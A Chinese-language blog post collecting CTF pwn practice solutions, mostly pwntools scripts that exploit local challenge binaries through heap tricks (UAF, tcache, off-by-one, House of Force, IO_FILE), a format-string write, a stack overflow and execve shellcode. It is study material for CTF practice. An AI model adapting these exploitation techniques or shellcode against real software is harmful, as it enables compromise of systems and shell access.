一些 pwn 的练习题

第五空间 线下赛

壹業

这个和 0ctf 的 babyheap 挺像的,很简单,但是本地的 so 文件的 one_gadegt 不太好用,本地调不通,很难受,感觉远程可以,应该不用调堆栈吧~~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[8:56:33] pic:壹業 $ one_gadget libc.so.6 
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
#context.log_level='debug'

r=process('./pwn')

def add(size):
    r.recvuntil('>>')
    r.sendline('1')
    r.recvuntil(':')
    r.sendline(str(size))
def show(idx):
    r.recvuntil('>>')
    r.sendline('2')
    r.recvuntil(':')
    r.sendline(str(idx))
def edit(idx,cont):
    r.recvuntil('>>')
    r.sendline('3')
    r.recvuntil(':')
    r.sendline(str(idx))
    r.recvuntil(':')
    r.sendline(cont)
def delete(idx):
    r.recvuntil('>>')
    r.sendline('4')
    r.recvuntil(':')
    r.sendline(str(idx))

add(0x60)#0
add(0x60)#1
add(0x60)#2
add(0xa0)#3
add(0x60)#4
add(0x60)#5
delete(3)
show(3)
r.recvuntil(':')
leak=u64(r.recv(6).ljust(8,'\x00'))
success(hex(leak))
mallochook=leak-0x68



lbase=leak-0x3c4b78
one=lbase+0xf1147

delete(0)
edit(0,p64(mallochook-0x23))

add(0x60)#6
add(0x60)#7
edit(7,'z'*0x13+p64(one))
#gdb.attach(r)
add(0x30)#8

r.interactive()

三學

输入溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
context.log_level='debug'
r=process('./pwn3x')

sys=0x8048440
sh=0x804a04c
r.recvuntil(':')
r.sendline('/bin/sh\0')
r.recvuntil(':')
r.sendline('1')
r.recvuntil(':')
r.sendline('-1')
r.recvuntil('\n')
r.sendline('a'*96+p32(sys)+p32(0)+p32(sh))

r.interactive()

四諦

第一次接触到这种必须分析数据结构的堆,简单记录一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
#context.log_level='debug'
r= process('./pwn')
libc = ELF('libc.so.6')

def addnote(size,content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)
def delnote(idx):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))
def printnote(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))

got_puts=0x804c024
func=0x80491f2

addnote(32,"0"*4)#0
addnote(32,"1"*4)#1
addnote(32,"2"*4)#2
delnote(0)
delnote(1)
addnote(8,p32(func)+p32(got_puts))#3
#gdb.attach(r)
printnote(0)
r.recvuntil(':')
puts=u32(r.recv(4))
success(hex(puts))
sys=puts-libc.symbols['puts']+libc.symbols['system']

delnote(3)
addnote(8,p32(sys)+';sh')#4
printnote(0)

r.interactive()

五蘊

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context.log_level='debug'
r=process('./pwn5x')

target=0x804c044
pay=p32(target)+p32(target+1)+p32(target+2)+p32(target+3)+'%10$hhn%11$hhn%12$hhn%13$hhn'
r.recvuntil(':')
r.sendline(pay)
r.recvuntil(':')
r.sendline(str(0x10101010))

r.interactive()

LCTF 2018

baby_heap

第一次做 tcache 的题,看 wp 愣是看了一天才明白,中间换了好几个,实在不好理解,摘抄自大佬,就不给大佬改了,中间加了点容易理解的注释,不知道大家能不能看懂,算了,直接在 wp 里解释一波,怕自己也忘了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from pwn import *
def new(size,note):
  p.recvuntil("?\n> ")
  p.sendline("1")
  p.recvuntil("size \n> ")
  p.sendline(str(size))
  p.recvuntil("content \n> ")
  if size==0:#新方式,拿本本记下来
    return
  else:
     p.send(note)
def delete(index):
  p.recvuntil("> ")
  p.sendline("2")
  p.recvuntil("index \n> ")
  p.sendline(str(index))
#context.log_level='debug'
p=process("./easy_heap")
for i in range(10):
   new(0,"kirin\n")
#make unsorted bin
for i in range(5):
  delete(9-i)#9 8 7 6 5
delete(3)
delete(1)
#tcache full!(1->3->5->6->7->8->9)

delete(2)
delete(0)
delete(4)

#700->300->500(unsortedbin)


for i in range(7):
    new(0,"kirin\n")
# new 0~6 400 600 800 900 a00 b00 c00


new(0,"kirin\n")#700 7
new(0xf8,"\x00")#300 8   off by one
new(0,"kirin\n")#500 9
for i in range(6):#free 1~6
  delete(i+1)
'''
500->c10 -> b10 - a10 - 910 - 810- 610
'''
delete(9)#500
delete(0)#400,合并了,赛高
gdb.attach(p)

#leak
p.recvuntil("?\n> ")
p.sendline("3")
p.recvuntil("index \n> ")
p.sendline("8")
s=p.recv(6)
libc_addr=u64(s.ljust(8,"\x00"))-0x3ebca0
print hex(libc_addr)
#leak over hahaa
#7 8 used


for i in range(8):
  new(0,"kirin\n")
#1   2   3   4   5   6   9
#500 c10 b10 a10 910 810 610
delete(8)
delete(9)
#tcache
#610->300
new(0x10,p64(libc_addr+0x3ebc30))#malloc_hook
new(0x10,"kirin\n")
for i in range(8):
   delete(i)#最后一次返回 malloc
for i in range(8):
   new(0x10,p64(libc_addr+0x10a38c))#one_gadegt
delete(0)
p.recvuntil("> ")
p.sendline("1")
p.interactive()

感觉 tcache 很难构造啊,还得多看源码和调试

1007

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
#context.log_level='debug'
r=process('./1007')
r.sendlineafter(':\n','3')
r.sendlineafter('?\n','a'*0x28+p64(0x12345678))
r.sendlineafter(':\n','2')
r.recvuntil('[')
addr = int(r.recvuntil(']')[:-1],16)
r.sendlineafter(':\n','3')
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
a = shellcode.ljust(0x38,'\x00')
r.sendlineafter('?\n',a+p64(addr))
r.sendlineafter(':\n','aa')
r.recv()
r.interactive()

在这里有两个奇怪的点

  • 为啥送 payload 的时候r.sendlineafter('?\n',a+p64(addr+0x40)+a)失败了
  • asm(shellcraft.sh())等一堆 shellcode 都不好用,为啥呢

铁人三项

littlenote

UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
io=process('./littlenote')
def add(content):
    io.sendline('1')
    io.sendafter('e\n',content)
    io.sendlineafter('?\n','Y')
    io.recvuntil('e\n')
def show(index):
    io.sendline('2')
    io.sendlineafter('?\n',str(index))
    return (io.recvuntil("\n"))[:-1]

def free(index):
    io.sendline('3')
    io.recvuntil('?\n')
    io.sendline(str(index))
    io.recvuntil('Done\n')

add('\x00'*0x58+p64(0x71))
add('1')
add(p64(0x0)*5+p64(0x41))#bypass
free(1)
free(0)
free(1)

heap_base=u64((show(0)).ljust(8,'\x00'))-0x70
print "heap_base -> " + hex(heap_base)
add(p64(heap_base+0x60))
add('1')
add('1')
add('\x00'*8+p64(0xA1))
free(1)
libc_base=u64((show(1)).ljust(8,'\x00'))-0x3C4B78
print "libc_base -> " + hex(libc_base)
one_gadget=libc_base+0xf02a4
print "one_gadget -> " + hex(one_gadget)
add('7') # 7
add('8') # 8
add('9') # 9
free(7)
free(8)
free(7)
point=libc_base+0x3c4af5-8
print "point -> " +hex(point) 
add(p64(point)) # 10
add('b') # 11
add('c') # 12
add('a'*19+p64(one_gadget))
io.sendline('1')
io.recv()
io.interactive()

这题比较恶心,只能构造一个单位长度的 chunk ,不过还好洞很严重, 2333 . UAF 实在太恐怖了

bookstore

堆溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
env=os.environ
#env['LD_PRELOAD']='./libc_64.so'
#context.log_level='debug'
r=process('./bookstore')
def add(author,size,cont):
    r.recvuntil('Your choice:')
    r.sendline('1')
    r.recvuntil('What is the author name?')
    r.sendline(author)
    r.recvuntil('How long is the book name?')
    r.sendline(str(size))
    r.recvuntil('What is the name of the book?')
    r.sendline(cont)
def delete(idx):
    r.recvuntil('Your choice:')
    r.sendline('2')
    r.recvuntil('?')
    r.sendline(str(idx))
def show(idx):
    r.recvuntil('Your choice:')
    r.sendline('3')
    r.recvuntil('?')
    r.sendline(str(idx))
add('a'*0x10,0,'0'*0x10)#0
add('b'*0x10,0x40,'1'*0x10)#1
add('c'*0x10,0x40,'2'*0x10)#2
add('d'*0x10,0x40,'3'*0x10)#3
delete(0)
add('a'*0x10,0,'0'*0x18+p64(0xa1))#0
delete(1)

add('b',0,'1'*1)#1
show(1)
r.recvuntil('\x65\x3a')
lleak=u64(r.recv(6).ljust(8,'\x00'))
print "lleak:"+hex(lleak)
lbase=lleak-0x3c4c31
sys=lbase+0x45390
sh=lbase+0x18cd57
iolistall=lbase+0x3c5520
strjumps=lbase+0x3c37a0

fire=p64(0)+p64(0x61)+p64(0)+p64(iolistall-0x10)+p64(0)+p64(1)+p64(0)+p64(sh)+p64(0)*19+p64(strjumps-8)
fire=fire.ljust(0xe8,'\x00')+p64(sys)
add('e',0,'\x00'*0x10+fire)#4
r.recvuntil('Your choice:')
r.sendline('1')
r.recvuntil('What is the author name?')
r.sendline('test')
r.recvuntil('How long is the book name?')
r.sendline(str(0x40))
r.interactive()

师傅直接根据溢出用 IO_FILE 做的,整的我头皮发麻.又懂了一个知识点,开心,但是这个我不太知道偏移有什么好的办法去算

myhouse

off by one(很大范围)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
env=os.environ
#env['LD_PRELOAD']='./myhouse.so'
#context.log_level='debug'
libc=ELF('./myhouse.so')
r=process('./myhouse')
def addroom(size):
    r.recvuntil('Your choice:\n')
    r.sendline('1')
    r.recvuntil('What is the size of your room?')
    r.sendline(str(size))
def editroom(cont):
    r.recvuntil('Your choice:')
    r.sendline('2')
    r.recvuntil('shining!')
    r.send(cont)
def show():
    r.recvuntil('Your choice:')
    r.sendline('3')
#step 1:write '\x00' to main_arena's top_chunk pointer and set top's size
r.recvuntil('name?')
r.send('a'*0x20)
r.recvuntil('name of your house?')
r.send('b'*0xf8+p64(0xffffffffffffffff))
gdb.attach(r)
r.recvuntil('size of your house?')
r.sendline(str(0x5c5b69))
r.recvuntil('Too large!')
r.sendline(str(0x200000))
gdb.attach(r)
r.recvuntil('Give me its description:')
r.send('c'*0x30)
#step 2:leak heap address
show()
r.recvuntil('a'*0x20)
heap=u64(r.recvline()[:-1].ljust(8,'\x00'))
print "heap:"+hex(heap)

#step 3:house of force
bssp=0x6020c0
addroom(bssp-(heap+0xf0)-0x20)
addroom(0x60)
#step 4:leak GOT and change GOT
got_atoi=0x602058
editroom(p64(got_atoi)+p64(got_atoi))
show()
r.recvuntil('And description:\n')
atoi=u64(r.recvline()[:-1].ljust(8,'\x00'))
print "atoi:"+hex(atoi)
sys=atoi-libc.symbols['atoi']+libc.symbols['system']
editroom(p64(sys))
r.sendline('sh')
r.interactive()

师傅跪了,思路太无敌了,很清楚,得消化两天